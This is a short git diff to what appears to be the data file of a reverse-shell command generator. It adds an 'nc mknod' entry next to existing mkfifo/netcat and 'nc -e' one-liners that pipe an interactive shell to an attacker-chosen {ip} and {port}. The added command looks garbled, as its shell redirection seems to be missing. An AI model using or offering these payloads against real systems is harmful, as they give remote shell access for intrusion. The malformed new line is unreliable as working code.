diff --git a/js/data.js b/js/data.js index 660a509..a4d0069 100644 --- a/js/data.js +++ b/js/data.js @@ -51,6 +51,11 @@ const reverseShellCommands = withCommandType( "command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f", "meta": ["linux", "mac"] }, + { + "name": "nc mknod", + "command": "cd /tmp;rm -f x; mknod x p && nc {ip} {port} 0x", + "meta": ["linux", "mac"] + }, { "name": "nc -e", "command": "nc {ip} {port} -e {shell}",